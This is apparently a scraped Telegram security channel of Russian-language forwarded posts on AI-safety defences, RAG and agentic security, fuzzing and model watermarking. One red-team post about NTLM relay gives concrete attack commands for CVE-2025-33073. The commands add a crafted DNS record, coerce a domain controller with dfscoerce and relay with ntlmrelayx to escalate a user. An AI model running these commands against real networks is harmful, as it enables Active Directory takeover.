CrossGuard: Safeguarding MLLMs against Joint-Modal Implicit Malicious Attacks
https://github.com/AI45Lab/MLLMGuard
https://github.com/AI45Lab/MLLMGuard
FalseCrashReducer: Mitigating False Positive Crashes in
OSS-Fuzz-Gen Using Agentic AI
https://www.researchgate.net/publication/396143052_FalseCrashReducer_Mitigating_False_Positive_Crashes_in_OSS-Fuzz-Gen_Using_Agentic_AI
OSS-Fuzz-Gen Using Agentic AI
https://www.researchgate.net/publication/396143052_FalseCrashReducer_Mitigating_False_Positive_Crashes_in_OSS-Fuzz-Gen_Using_Agentic_AI
Forwarded from Proxy Bar
Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
❤1
Список инструментов, статей и ресурсов, которые используют большие языковые модели (LLM) для обратного проектирования (RE), декомпиляции, бинарного анализа и исследований в области кибербезопасности.
https://github.com/ram-elgov/awesome-llm-reverse-engineering
https://github.com/ram-elgov/awesome-llm-reverse-engineering
GitHub
GitHub - ram-elgov/awesome-llm-reverse-engineering: A curated list of tools, papers, datasets, and resources that leverage Large…
A curated list of tools, papers, datasets, and resources that leverage Large Language Models (LLMs) for reverse engineering, decompilation, binary analysis, and cybersecurity research. - ram-elgov/...
Forwarded from GitHub Community
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from PWN AI (Artyom Semenov)
5 уровней защиты генеративного ИИ в современном мире.
Если вы считаете, что атаки для LLM классифицируют только регулярными выражениями, то вы живёте в 2023 году. Ведь с того времени подходов и идей к реализации защитных механизмов появилось достаточно много. Я решил поделить на 5 ключевых уровней – от того, что реализуется в модели до того, что делают уже на этапах эксплуатации модели.
1. Alignment. Выравнивание модели в соответствии с соображениями безопасности – является основой. Раньше в индустрии применялся подход SFT (Supervised Fine-Tuning)(когда дообучаются на заранее размеченных данных, применяемых к конкретной задаче) теперь применяется – обучение с подкреплением и Direct Preference Optimization – чтобы вероятность ответа “positive” была выше. Anthropic пошёл ещё дальше. Их модель сама генерирует синтетические данные для обучения, критикуя собственные ответы на основе «Конституции» (набора правил), снижая зависимость от человеческой разметки.
2. Контроль за представлениями модели. Суть в том, что на этом уровне мы работаем уже с весами модели. Тут мы можем непосредственно контролировать внутренние активации модели, которые могут отвечать за «ложь», «манипуляции» или «жажду власти» - интерпретируя поведение модели. Для этого используется метод Linear Artifical Tomography – путём отправки в модель примеров (правды/лжи или пользы/вреда).
Также на этом уровне появляется подход – Circuit Breakers, который буквально вмешивается в скрытые состояния модели/процесс её размышлений и корректирует состояние размышлений с небезопасных на безопасные/доверенные/не содержащих признаков следования джейлбрейку (если тот был подан на вход). У Anthropic есть инструмент по этому вопросу.
Ну и не стоит забывать про то, что модель можно разучить небезопасным вещам, без необходимости полного переобучения с нуля. Об этом в целом говорит подход Machine Unlearning. В подходе применяют градиентные методы, направленные на уменьшение уверенности модели в нежелательных ответах, например, через градиентный спуск по лоссу на «забываемых» данных или специализированные методы вроде influence unlearning.
3. Системные инструкции. Уже известный всем метод, суть в том, что вы ограничиваете взаимодействие модели с небезопасным, определяя изначально системный промпт. Тут можно отметить несколько подходов для реализации.
Например, внедрение иерархии инструкций, где системный промпт имеет приоритет над пользовательским (как это есть у OpenAI), а также использование специальных токенов типа <|start_header_id|>system для разделения контекста. Известно также что системные промпты Claude 3 включают сложные инструкции для конструктивного отказа без нравоучений пользователя. Делается это для того, чтобы избежать эффекта ложных отказов от ответа.
4. Гардрейлы. На входе, на выходе и в зависимости от контекста – эти инструменты классифицируют небезопасные данные. Делают это они не всегда эффективно, а зачастую и сами могут быть атакованы. Но всё-же используются. Гардрейлы позволяют контролировать цепочки диалогов, конкретные темы для разговора, а в некоторых случаях успешно справляются с атаками через невидимые символы и прочее. Важно понимать, что в большинстве случаев гардрейлом выступает либо другая LLM-модель (ShieldGemma, Llama Guard 3) либо же bert-based классификатор.
5. Red Teaming. Наилучшая защита, как известно – это нападение. Редтимеры уже изобрели большое количество инструментов, датасетов для тестирования, а также если смотреть на MITRE Atlas – техник и тактик для реализации атак. Может быть, даже такое что перед релизом модели приглашают экспертов в узких доменах (биология, оружие, кибербезопасность) – для того, чтобы они тестировали модель на возможный небезопасный вывод. Как это к примеру делают в рамках Preparedness Framework от OpenAI.
Если вы считаете, что атаки для LLM классифицируют только регулярными выражениями, то вы живёте в 2023 году. Ведь с того времени подходов и идей к реализации защитных механизмов появилось достаточно много. Я решил поделить на 5 ключевых уровней – от того, что реализуется в модели до того, что делают уже на этапах эксплуатации модели.
1. Alignment. Выравнивание модели в соответствии с соображениями безопасности – является основой. Раньше в индустрии применялся подход SFT (Supervised Fine-Tuning)(когда дообучаются на заранее размеченных данных, применяемых к конкретной задаче) теперь применяется – обучение с подкреплением и Direct Preference Optimization – чтобы вероятность ответа “positive” была выше. Anthropic пошёл ещё дальше. Их модель сама генерирует синтетические данные для обучения, критикуя собственные ответы на основе «Конституции» (набора правил), снижая зависимость от человеческой разметки.
2. Контроль за представлениями модели. Суть в том, что на этом уровне мы работаем уже с весами модели. Тут мы можем непосредственно контролировать внутренние активации модели, которые могут отвечать за «ложь», «манипуляции» или «жажду власти» - интерпретируя поведение модели. Для этого используется метод Linear Artifical Tomography – путём отправки в модель примеров (правды/лжи или пользы/вреда).
Также на этом уровне появляется подход – Circuit Breakers, который буквально вмешивается в скрытые состояния модели/процесс её размышлений и корректирует состояние размышлений с небезопасных на безопасные/доверенные/не содержащих признаков следования джейлбрейку (если тот был подан на вход). У Anthropic есть инструмент по этому вопросу.
Ну и не стоит забывать про то, что модель можно разучить небезопасным вещам, без необходимости полного переобучения с нуля. Об этом в целом говорит подход Machine Unlearning. В подходе применяют градиентные методы, направленные на уменьшение уверенности модели в нежелательных ответах, например, через градиентный спуск по лоссу на «забываемых» данных или специализированные методы вроде influence unlearning.
3. Системные инструкции. Уже известный всем метод, суть в том, что вы ограничиваете взаимодействие модели с небезопасным, определяя изначально системный промпт. Тут можно отметить несколько подходов для реализации.
Например, внедрение иерархии инструкций, где системный промпт имеет приоритет над пользовательским (как это есть у OpenAI), а также использование специальных токенов типа <|start_header_id|>system для разделения контекста. Известно также что системные промпты Claude 3 включают сложные инструкции для конструктивного отказа без нравоучений пользователя. Делается это для того, чтобы избежать эффекта ложных отказов от ответа.
4. Гардрейлы. На входе, на выходе и в зависимости от контекста – эти инструменты классифицируют небезопасные данные. Делают это они не всегда эффективно, а зачастую и сами могут быть атакованы. Но всё-же используются. Гардрейлы позволяют контролировать цепочки диалогов, конкретные темы для разговора, а в некоторых случаях успешно справляются с атаками через невидимые символы и прочее. Важно понимать, что в большинстве случаев гардрейлом выступает либо другая LLM-модель (ShieldGemma, Llama Guard 3) либо же bert-based классификатор.
5. Red Teaming. Наилучшая защита, как известно – это нападение. Редтимеры уже изобрели большое количество инструментов, датасетов для тестирования, а также если смотреть на MITRE Atlas – техник и тактик для реализации атак. Может быть, даже такое что перед релизом модели приглашают экспертов в узких доменах (биология, оружие, кибербезопасность) – для того, чтобы они тестировали модель на возможный небезопасный вывод. Как это к примеру делают в рамках Preparedness Framework от OpenAI.
👍1
Forwarded from CyberSecurityTechnologies
Securing_RAG.pdf
441.2 KB
#RAG_Security
"Securing RAG: A Risk Assessment and Mitigation Framework", May 2025.
// The proposed framework aims to guide the implementation of robust, compliant, secure, and trustworthy RAG systems
See also:
]-> Offline and Secure RAG system
]-> Security RAG for LLM vulnerability detection
]-> RAG/LLM Security Scanner
"Securing RAG: A Risk Assessment and Mitigation Framework", May 2025.
// The proposed framework aims to guide the implementation of robust, compliant, secure, and trustworthy RAG systems
See also:
]-> Offline and Secure RAG system
]-> Security RAG for LLM vulnerability detection
]-> RAG/LLM Security Scanner
👍1
Forwarded from burpsuite (not official)
GitHub
GitHub - tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension: Burp Suite extension to detect the Next.js / React Server Components…
Burp Suite extension to detect the Next.js / React Server Components (RSC) Remote Code Execution vulnerability (CVE-2025-55182 & CVE-2025-66478). - tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-S...
❤2
Forwarded from Евгений Кокуйкин - Raft
Большой релиз OWASP Top 10 for Agentic AI Applications 🔥.
Последние месяцы мы в команде Agentic Security Initiative собирали первый отраслевой фреймворк по безопасности агентных ИИ-систем. Над документом работали более 100 человек: ресерчеры, вендоры, представители регуляторов и институтов вроде NIST и Linux Foundation.
Мы приоритизировали риски и собрали практические меры защиты для автономных агентов, которые уже заходят в корпоративную инфраструктуру. Если вы строите AI Security-стратегию на 2026 год, из OWASP в первую очередь стоит взять именно этот документ за основу.
Ссылка на релиз.
Сегодня в 17:00 по Москве официальный запуск гайда. Ссылка на трансляцию.
Последние месяцы мы в команде Agentic Security Initiative собирали первый отраслевой фреймворк по безопасности агентных ИИ-систем. Над документом работали более 100 человек: ресерчеры, вендоры, представители регуляторов и институтов вроде NIST и Linux Foundation.
Мы приоритизировали риски и собрали практические меры защиты для автономных агентов, которые уже заходят в корпоративную инфраструктуру. Если вы строите AI Security-стратегию на 2026 год, из OWASP в первую очередь стоит взять именно этот документ за основу.
Ссылка на релиз.
Сегодня в 17:00 по Москве официальный запуск гайда. Ссылка на трансляцию.
OWASP Gen AI Security Project
OWASP Top 10 for Agentic Applications for 2026
The OWASP Top 10 for Agentic Applications 2026 is a globally peer-reviewed framework that identifies the most critical security risks facing autonomous and agentic AI systems. Developed through extensive collaboration with more than 100 industry experts,…
❤2
Мы внедряем новые методы окрашивания и блокировки моделей компьютерного зрения, чтобы защитить интеллектуальную собственность их владельцев. Окрашивание, также известное как нанесение водяных знаков, внедряет в модель секретное поведение, которое впоследствии может быть использовано для ее идентификации, в то время как блокировка направлена на то, чтобы сделать модель непригодной для использования, если во входные изображения не будет вставлен секретный триггер. В отличие от существующих методов, наши алгоритмы могут использоваться для определения и блокировки предварительно обученных моделей, не требуя тонкой настройки или переподготовки, и предоставляют доказуемые, вычислимые гарантии, ограничивающие вероятность ложных срабатываний в худшем случае. Изменение цвета и блокировки осуществляется путем непосредственного изменения небольшого количества параметров модели и оказывает минимальное влияние на производительность (разблокированной) модели. Заблокированные модели разблокируются путем вставки небольшого `триггерного патча" в угол входного изображения. Мы представляем экспериментальные результаты, демонстрирующие эффективность наших методов и демонстрирующие их практическую эффективность на различных моделях компьютерного зрения.
👍1